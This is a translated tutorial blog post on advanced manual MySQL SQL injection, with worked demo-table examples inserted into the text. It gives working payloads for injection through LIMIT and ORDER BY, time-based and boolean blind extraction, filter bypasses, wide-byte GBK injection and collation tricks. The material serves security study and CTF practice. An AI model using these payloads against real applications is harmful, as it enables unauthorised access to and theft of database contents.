Manual SQL injection: advanced techniques

0. Introduction

  The previous post covered the manual process and steps of SQL injection. In real-world targets and CTF challenges the queries vary, but there is almost always some filtering of user input, and those filters are not necessarily 100% safe. This post introduces a few tricks for bypassing common filters.

  If you are not familiar with the basic SQL injection process and steps, please read my earlier blog post first.

  There are bound to be omissions and errors in the text; corrections from more experienced readers are welcome.

 

1. Injecting into other parts of a statement

 (1) select xxx from xxx limit $num;

  The earlier post explained injection into the WHERE clause. The injection point can also sit in another clause, for example a LIMIT used for paging, which controls how many rows are displayed per page:

  select * from student limit $num;

  $num is the value we control. If we try the usual ORDER BY N technique to count columns here, MySQL reports a syntax error, because ORDER BY must appear before LIMIT, not after it. How do we count columns in this position? The answer is to append into @,@,@ to the query: the character '@' on its own is a valid MySQL user variable (with an empty name), and SELECT ... INTO assigns one result column to each variable.

  The number of variables must equal the number of result columns, otherwise MySQL errors out; increasing the number of @ until the statement succeeds reveals the column count.
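The column-counting step above, as an added example (not code from the original post). It assumes the vulnerable query is `select * from student limit $num;` and constructs a demo `student` table with three columns so the success and failure cases can be reproduced locally:

```sql
-- Added example, not from the original post. Demo table constructed here;
-- the vulnerable query is assumed to be:  select * from student limit $num;
CREATE TABLE student (id INT PRIMARY KEY, name VARCHAR(32), score INT);
INSERT INTO student VALUES (1,'alice',90),(2,'bob',75),(3,'carol',60);

-- $num = "1 order by 3": syntax error, ORDER BY is not allowed after LIMIT.
-- select * from student limit 1 order by 3;

-- $num = "1 into @,@": fails, two variables for three result columns
-- ("The used SELECT statements have a different number of columns").
-- select * from student limit 1 into @,@;

-- $num = "1 into @,@,@": succeeds, so the result has exactly three columns.
-- Each '@' is a user variable with an empty name; nothing is displayed,
-- the absence of an error is the signal.
select * from student limit 1 into @,@,@;

-- MySQL 8.0 still accepts INTO in this position (after LIMIT), so the
-- trick is not tied to the 5.x parser.
```

Because the injection point is after LIMIT, a UNION cannot be appended here; once the column count is known, data is extracted with the time-based or boolean techniques of the later sections.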

  (2) update, insert, delete

  These are handled like select: locate the position of the injected parameter, determine the injection type (error-based, boolean, time-based), and then construct the injected expression.

  (3) order by injection

  We already used ORDER BY N to count columns. The ORDER BY expression can also carry a time delay through a bitwise operation: sleep() returns 0, so 1|(sleep(5)) still evaluates to the column index 1 while delaying the query by five seconds:

select * from student order by 1|(sleep(5));
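The ORDER BY injection point worked through as an added example (not from the original post). It assumes a vulnerable query `select * from student order by $col;` and a demo table constructed here; it also goes one step beyond the text by showing the boolean form, where the sort order itself becomes the side channel:

```sql
-- Added example, not from the original post. Assumes the vulnerable query
--   select * from student order by $col;
-- and the demo table below.
CREATE TABLE student (id INT PRIMARY KEY, name VARCHAR(32), score INT);
INSERT INTO student VALUES (1,'alice',90),(2,'bob',75),(3,'carol',60);

-- Column count: ORDER BY N errors once N exceeds the number of columns.
select * from student order by 3;       -- ok
-- select * from student order by 4;    -- Unknown column '4' in 'order clause'

-- Time-based: sleep() returns 0, so 1|sleep(5) is still the column index 1
-- and the statement stays valid while the server sleeps.
select * from student order by 1|(sleep(5));

-- Conditional delay: the server only sleeps when the first character of
-- user() is 'r'; the expression evaluates to 1 either way.
select * from student order by 1|(if(substr(user(),1,1)='r', sleep(3), 0));

-- Boolean form: when the condition holds rows come back sorted by id
-- (alice, bob, carol), otherwise by score (carol, bob, alice). No delay is
-- needed, the order of the displayed rows answers the question.
select * from student order by (case when substr(user(),1,1)='r' then id else score end);
```

The conditional variants are what turn ORDER BY into a usable blind channel; the unconditional sleep only confirms that the position is injectable.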

 

2. Time-based blind injection

  When the page echoes neither query results nor error messages, consider a time-based blind. The principle is to make sleep() conditional on a boolean test and observe the response time.

  E.g.

select * from student where id=1 and if(user()='root@localhost',sleep(5),null);#check the current user

select * from student where id=1 and if(substr(user(),1,1)='r',sleep(5),null);#test one character at a time

  Start with a condition that is always true to check whether sleep() is available at all. If sleep() is filtered, the delay can be produced by one of the other methods below.

 (1) Delay methods

  • sleep(seconds).
  • benchmark(count, expr) executes expr count times; using one of MySQL's built-in hash functions as expr makes each iteration expensive enough that a large count behaves like sleep(). Adjust the count to the target's CPU.
select * from student where id=1 and if(true,benchmark(10000000,sha(1)),null);
  • Cartesian product: counting a self-join of a large table such as information_schema.columns takes measurable time.
select count(*) from information_schema.columns A,information_schema.columns B;#count(*) returns the row count
  • get_lock(str, timeout) needs two sessions: the first acquires the lock on str, after which the second session's get_lock on the same name waits up to timeout seconds; a negative timeout waits indefinitely. The lock is released by an explicit release_lock() or when the session ends; committing or rolling back a transaction does not release it.
  • length(str): build a very long string with rpad() and return its length; the time is spent constructing the string.
select LENGTH(concat(rpad(1,9999999,'a'),rpad(1,9999999,'a'),rpad(1,9999999,'a'),rpad(1,9999999,'a'),rpad(1,9999999,'a'),rpad(1,9999999,'a'),rpad(1,9999999,'a')));

  • rlike / regexp: build the same long string with rpad() and match it against a regular expression with nested quantifiers; the backtracking in the regex engine is what takes time, and the string length controls how long.
select concat(rpad(1,9999999,'a'),rpad(1,9999999,'a'),rpad(1,9999999,'a'),rpad(1,9999999,'a'),rpad(1,9999999,'a'),rpad(1,9999999,'a'),rpad(1,9999999,'a')) rlike '(a.*)+(a.*)+(a.*)+(a.*)+(a.*)';

  ps: the constructed string must stay within MySQL's max_allowed_packet and memory limits, otherwise the string functions return NULL or the query errors.

 (2) Conditional expressions

  • if(expr, expr1, expr2): returns expr1 when expr is true, expr2 otherwise.
  • case when cond then expr1 else expr2 end: the CASE WHEN syntax gives the same conditional when if() is filtered.

 (3) String extraction

  • substr(str, pos, len): like slicing in Python, except that in MySQL positions start at 1, and a negative pos counts back from the end of the string.
  • mid(str, pos, len): same as substr().
  • substring_index(str, delim, count): returns everything to the left of the count-th occurrence of delim (a negative count counts occurrences from the right).
select substring_index('a.b.c.d','.',3);#returns a.b.c
  • left(str, len): returns the leftmost len characters of str.
  • right(str, len): returns the rightmost len characters of str.
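The three building blocks of section 2 (a delay, a conditional, a string-extraction function) combined into one probe, as an added example that is not from the original post. The same boolean test is issued once with each delay primitive, so that when sleep() is filtered the condition can be re-sent unchanged with another delay. It assumes the vulnerable query `select * from student where id=$id;`, constructs the demo table inline, and the delay sizes are illustrative values that must be tuned for the target:

```sql
-- Added example, not from the original post. One boolean test, "is the first
-- character of user() at or after 'm' (ASCII 109)?", issued with each delay
-- primitive. Assumes the vulnerable query  select * from student where id=$id;
-- and the demo table built here; delay sizes are illustrative only.
CREATE TABLE student (id INT PRIMARY KEY, name VARCHAR(32));
INSERT INTO student VALUES (1,'alice');

-- 1. sleep(): the baseline. ascii() plus a comparison turns the character
--    test into a range test, so a binary search needs about 7 probes per
--    character instead of one probe per candidate character.
select * from student where id=1 and if(ascii(substr(user(),1,1))>=109, sleep(3), 0);

-- 2. benchmark(): CPU-bound, works when sleep() is filtered.
select * from student where id=1 and if(ascii(substr(user(),1,1))>=109, benchmark(20000000, sha1('x')), 0);

-- 3. Cartesian product: counting a self-join of information_schema.columns.
select * from student where id=1 and if(ascii(substr(user(),1,1))>=109,
  (select count(*) from information_schema.columns a, information_schema.columns b), 0);

-- 4. rlike with nested quantifiers on a long string built by rpad(). Keep the
--    string under max_allowed_packet (rpad() returns NULL beyond it). MySQL
--    8.0 uses ICU and aborts a match after regexp_time_limit (32 ms by
--    default), so this primitive is only useful against older servers.
select * from student where id=1 and if(ascii(substr(user(),1,1))>=109,
  concat(rpad(1,999999,'a'), rpad(1,999999,'a')) rlike '(a.*)+(a.*)+(a.*)+(a.*)+(a.*)', 0);

-- 5. get_lock(): a second session must already hold the lock.
--    session A (attacker-controlled, keeps the lock):  select get_lock('inj', 0);
--    session B (the injected query) then waits up to 3 s when the condition holds:
select * from student where id=1 and if(ascii(substr(user(),1,1))>=109, get_lock('inj', 3), 0);
--    afterwards in session A:  select release_lock('inj');

-- The same test with CASE WHEN, for when if() itself is filtered.
select * from student where id=1 and case when ascii(substr(user(),1,1))>=109 then sleep(3) else 0 end;
```

In every variant the true branch returns 0 after the delay, so the row is never displayed; only the response time differs between the two outcomes. Measure an unconditional baseline first (`if(1=1, ...)`) and a false one (`if(1=2, ...)`) on the target before trusting individual probes, since network jitter can look like a short delay.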

  Time-based blind injection is essentially a form of boolean blind injection: it also relies on two distinguishable responses, except that the difference is the response time rather than anything displayed on the page.

 

3. Boolean-based blind injection

  Boolean blind injection uses the difference between two responses (a row shown or not, a page that differs or not) to guess data; the ORDER BY trick above is one form of it. Characters are usually recovered either by binary search on their ASCII value or bit by bit. The condition can also be connected to the expression through short-circuit operators or bitwise operators, which helps when and/or are filtered.
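The two probe styles named above, as an added example that is not from the original post. It assumes the vulnerable query `select * from student where id=$id;` on a demo table constructed here, and that the server runs as root@localhost so that the first character of user() is 'r' (ASCII 114); a true condition returns the row, a false one returns nothing:

```sql
-- Added example, not from the original post. Assumes the vulnerable query
--   select * from student where id=$id;
-- and that user() starts with 'r' (ASCII 114 = 0b1110010).
CREATE TABLE student (id INT PRIMARY KEY, name VARCHAR(32));
INSERT INTO student VALUES (1,'alice');

-- Binary search on the ASCII value of one character: each probe halves the
-- printable range 32..126, so about 7 probes recover the character.
select * from student where id=1 and ascii(substr(user(),1,1)) > 64;    -- row returned
select * from student where id=1 and ascii(substr(user(),1,1)) > 96;    -- row returned
select * from student where id=1 and ascii(substr(user(),1,1)) > 112;   -- row returned
select * from student where id=1 and ascii(substr(user(),1,1)) > 120;   -- no row: 112 < c <= 120

-- Bit by bit: test one bit of the character code per probe. Always 7 probes
-- per character and no assumption about the ordering of the result.
select * from student where id=1 and (ascii(substr(user(),1,1)) >> 6) & 1;   -- bit 6 of 114 is 1: row returned
select * from student where id=1 and (ascii(substr(user(),1,1)) >> 3) & 1;   -- bit 3 of 114 is 0: no row

-- Connecting the condition without the words and/or:
-- short-circuit operator
select * from student where id=1 && ascii(substr(user(),1,1)) = 114;
-- bitwise operator: & binds tighter than =, so this is  id = (1 & cond)
-- and the row is returned only when the condition is true.
select * from student where id=1 & (ascii(substr(user(),1,1)) = 114);
```

Binary search needs fewer probes on average, but the bit-by-bit form is easier to automate when every probe must look identical in length, and both share the same ascii()/substr() core so filters on one rarely block the other.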

 

4. Stacked (multi-statement) injection

  When the database API call used by the application supports executing multiple SQL statements at once, stacked injection is possible: terminate the original statement with ';' and append your own statement after it.

 

5. MySQL encoding injection

(1) Weak type conversion

  First consider the query select * from student where name = 1;

  Why does it return rows? Because name is converted to a number before being compared with 1. The conversion resembles PHP's: the string is read as a number until the first non-numeric character, so 'abc' becomes 0 and '1abc' becomes 1. This can be used to shape query conditions, for example name = 0 matches every name that does not start with a digit.

(2) Wide-byte injection

  When the database connection uses the GBK encoding, a byte above 0x80 combines with the following byte into a single two-byte character. Combined with the back end's escaping this yields an injection.

  For example, when the back end escapes ' into \' (so %27 becomes %5C%27), if the connection uses GBK and we submit %df', the escaped input is %df%5c%27. The leading %df%5c is decoded as one Chinese character, which swallows the backslash and leaves the quote %27 unescaped, so the injection succeeds.

(3) Character set and collation features

  In the utf8_unicode_ci collation, comparison is case-insensitive and Ä = A, Ö = O, Ü = U hold; furthermore ß = ss.

  In the utf8_general_ci collation, ß = s.

  Further equivalences can be found by testing.

(4) Hex conversion

  If quotes are filtered so that table and column names cannot be written as string literals, they can be written as hex literals with a 0x prefix instead.
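The four behaviours of section 5 reproduced on one demo table, as an added example that is not from the original post. It assumes a MySQL server with the gbk, latin1 and utf8mb4 character sets available (utf8mb4_unicode_ci and utf8mb4_general_ci behave like the utf8 collations named above for these characters), and the table, rows and hex values are constructed here:

```sql
-- Added example, not from the original post. Demo table constructed here;
-- the column `name` uses unicode_ci, `name_general` uses general_ci so the
-- two collations can be compared side by side.
SET NAMES utf8mb4;
CREATE TABLE student (
  id           INT PRIMARY KEY,
  name         VARCHAR(32) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci,
  name_general VARCHAR(32) CHARACTER SET utf8mb4 COLLATE utf8mb4_general_ci
);
INSERT INTO student VALUES (1,'alice','alice'),(2,'1bob','1bob'),(3,'Straße','Straße');

-- (1) weak typing: a string compared with a number is cast to a number,
--     reading up to the first non-numeric character ('alice' -> 0, '1bob' -> 1).
select id from student where name = 0;   -- 1 and 3: names not starting with a digit
select id from student where name = 1;   -- 2

-- (2) wide byte: after escaping, %df%27 becomes %df%5c%27. Under gbk the two
--     bytes 0xDF 0x5C form one character, so the backslash is consumed and
--     the quote 0x27 is left unescaped.
select char_length(convert(0xdf5c using gbk));      -- 1: one two-byte character
select char_length(convert(0xdf5c using latin1));   -- 2: backslash stays separate
-- Hardening: escape with the same character set the connection uses
-- (mysqli_set_charset + mysqli_real_escape_string) or use prepared
-- statements; addslashes() is charset-unaware.

-- (3) collation equivalences
select 'ß' = 'ss' collate utf8mb4_unicode_ci;   -- 1
select 'ß' = 's'  collate utf8mb4_general_ci;   -- 1
select 'Ä' = 'A'  collate utf8mb4_unicode_ci;   -- 1
select id from student where name = 'strasse';         -- 3, via unicode_ci (ß = ss, case-insensitive)
select id from student where name_general = 'strase';  -- 3, via general_ci (ß = s)

-- (4) hex literals replace quoted strings when quotes are filtered:
--     'student' = 0x73747564656e74, 'alice' = 0x616c696365
select column_name from information_schema.columns where table_name = 0x73747564656e74;
select id from student where name = 0x616c696365;      -- 1
```

The collation rows matter for filters that blacklist exact strings: a check that rejects 'admin' but compares the stored value with a case-insensitive collation will accept 'ADMIN', and under unicode_ci a stored 'straße' matches 'strasse'.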

6. Summary

  This post built on the earlier explanation and introduced several further injection methods along with many MySQL functions. That completes the MySQL-side material; the next post will focus on bypassing the back-end filters applied to request parameters.

  If anything should be added, please leave it in the comments.

 


Origin www.cnblogs.com/xenny/p/11568139.html